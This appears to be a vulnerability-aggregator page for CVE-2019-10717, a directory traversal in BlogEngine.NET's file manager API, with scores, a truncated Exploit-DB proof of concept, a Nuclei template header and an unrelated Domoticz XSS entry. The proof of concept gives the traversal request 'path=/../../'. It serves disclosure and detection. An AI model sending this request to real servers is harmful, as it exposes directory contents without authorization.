CVE-2019-10717
published 2019-07-03CVE-2019-10717: BlogEngine.NET 3.3.7.0 allows /api/filemanager Directory Traversal via the path parameter.
PriorityP350high7.1CVSS 3.0
AVNACLPRLUINSUCLIHAN
EXPLOIT
EPSS
5.40%
91.7th percentile
BlogEngine.NET 3.3.7.0 allows /api/filemanager Directory Traversal via the path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dotnetblogengine | blogengine.net | — | — |
CVSS provenance
nvdv3.07.1HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
nvdv2.05.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal
exploitdb·2019-06-25
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal
---
# Exploit Title: Directory Traversal on BlogEngine.NET
# Date: 24 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10717
1. Description
BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory.
2. Proof of Concept
Log in to the application and submit a GET request to /api/filemanager:
Request:
~~~
GET /api/filemanager?path=/../../ HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: g
Nuclei
BlogEngine.NET 3.3.7.0 - Local File Inclusion
nuclei·CVSS 7.1
CVE-2019-10717 [HIGH] BlogEngine.NET 3.3.7.0 - Local File Inclusion
BlogEngine.NET 3.3.7.0 - Local File Inclusion
BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
Template:
id: CVE-2019-10717
info:
name: BlogEngine.NET 3.3.7.0 - Local File Inclusion
author: arafatansari
severity: high
description: |
BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
impact: |
An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
remediation: |
Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
- https://github.com/rxtur/BlogEngine.NET/commit
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2019-15480 domoticz: cross-site scripting via item.Name
bugzilla·2019-10-07·CVSS 5.4
CVE-2019-15480 [MEDIUM] CVE-2019-15480 domoticz: cross-site scripting via item.Name
CVE-2019-15480 domoticz: cross-site scripting via item.Name
Domoticz 4.10717 has XSS via item.Name.
Reference:
https://github.com/domoticz/domoticz/issues/3367
https://github.com/domoticz/domoticz/pull/3368
Discussion:
Created domoticz tracking bugs for this issue:
Affects: fedora-all [bug 1758998]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
http://seclists.org/fulldisclosure/2019/Jun/44https://github.com/rxtur/BlogEngine.NET/commits/masterhttps://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirecthttp://seclists.org/fulldisclosure/2019/Jun/44https://github.com/rxtur/BlogEngine.NET/commits/masterhttps://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
2019-07-03
Published